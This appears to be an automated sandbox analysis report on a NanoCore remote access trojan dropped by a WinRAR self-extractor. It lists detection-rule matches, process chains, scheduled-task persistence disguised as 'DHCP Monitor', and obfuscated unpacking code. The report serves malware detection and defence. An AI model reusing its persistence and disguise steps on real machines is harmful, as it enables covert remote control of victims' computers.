        Source: 00000016.00000003.468116768.0000000003D51000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bspmflqee.pif PID: 3836, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 4644, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bspmflqee.pif PID: 1048, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bspmflqee.pif PID: 3032, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: bspmflqee.pif PID: 4732, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 6540, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: String function: 00D8D870 appears 35 times
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: String function: 00D8D940 appears 51 times
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: String function: 00D8E2F0 appears 31 times
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D76FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00D76FC6
        Source: ameHrrFwNp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile created: C:\Users\user\AppData\Roaming\98025414Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@29/48@5/2
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile read: C:\Windows\win.iniJump to behavior
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D76D06 GetLastError,FormatMessageW,1_2_00D76D06
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_00D8963A
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile read: C:\Users\user\Desktop\ameHrrFwNp.exeJump to behavior
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ameHrrFwNp.exe 'C:\Users\user\Desktop\ameHrrFwNp.exe'
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ije
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp94A3.tmp'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeProcess created: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif 'C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif' ewdsxu.ijeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp94A3.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifFile created: C:\Users\user\temp\owxpr.pdfJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FC3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,4_2_00FC3EC5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5096:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ba2baad0-dd3f-4844-a1e3-4d042f9ae8b6}
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCommand line argument: sfxname1_2_00D8CBB8
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCommand line argument: sfxstime1_2_00D8CBB8
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCommand line argument: STARTDLG1_2_00D8CBB8
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: C:\Windows\System32\wscript.exeAutomated click: OK
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: ameHrrFwNp.exeStatic file information: File size 1068179 > 1048576
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: ameHrrFwNp.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: ameHrrFwNp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ameHrrFwNp.exe, 00000001.00000000.294783561.0000000000DA2000.00000002.00020000.sdmp
        Source: Binary string: RegSvcs.pdb, source: bspmflqee.pif, 00000004.00000003.393712127.0000000001299000.00000004.00000001.sdmp, RegSvcs.exe, 00000005.00000000.386280136.0000000000DD2000.00000002.00020000.sdmp, RegSvcs.exe, 00000009.00000002.411075709.00000000006F2000.00000002.00020000.sdmp, dhcpmon.exe, 0000000D.00000002.413266242.0000000000942000.00000002.00020000.sdmp, RegSvcs.exe, 00000013.00000002.444255890.0000000000102000.00000002.00020000.sdmp, dhcpmon.exe, 00000014.00000000.437845496.0000000000722000.00000002.00020000.sdmp, RegSvcs.exe, 00000018.00000002.492189058.0000000000F32000.00000002.00020000.sdmp, RegSvcs.exe, 00000020.00000000.514780927.0000000000EE2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, RegSvcs.exe, 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, RegSvcs.exe, 00000018.00000002.493660606.0000000003711000.00000004.00000001.sdmp, RegSvcs.exe, 00000020.00000002.539250856.00000000039C1000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 00000014.00000000.437845496.0000000000722000.00000002.00020000.sdmp, RegSvcs.exe, 00000018.00000002.492189058.0000000000F32000.00000002.00020000.sdmp, RegSvcs.exe, 00000020.00000000.514780927.0000000000EE2000.00000002.00020000.sdmp
        Source: ameHrrFwNp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: ameHrrFwNp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: ameHrrFwNp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: ameHrrFwNp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: ameHrrFwNp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8E336 push ecx; ret 1_2_00D8E349
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeCode function: 1_2_00D8D870 push eax; ret 1_2_00D8D88E
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00FA6BD5 push ecx; ret 4_2_00FA6BE8
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 5_2_072227D0 push es; ret 5_2_072227E0
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 5_2_07224810 push es; retn 0004h5_2_07224820
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 12_2_017F351C push es; ret 12_2_017F351D
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 12_2_017F01E3 push ds; ret 12_2_017F01E4
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 12_2_017F2635 push 0000003Dh; ret 12_2_017F263D
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 12_2_017F46BF push edx; iretd 12_2_017F46C0
        Source: C:\Users\user\AppData\Roaming\98025414\bspmflqee.pifCode function: 4_2_00F9EE30 LoadLibraryA,GetProcAddress,4_2_00F9EE30
        Source: C:\Users\user\Desktop\ameHrrFwNp.exeFile created: C:\Users\user\AppData\Roaming\98025414\__tmp_rar_sfx_access_check_6412281Jump to behavior
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.RegSvcs.exe.500000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
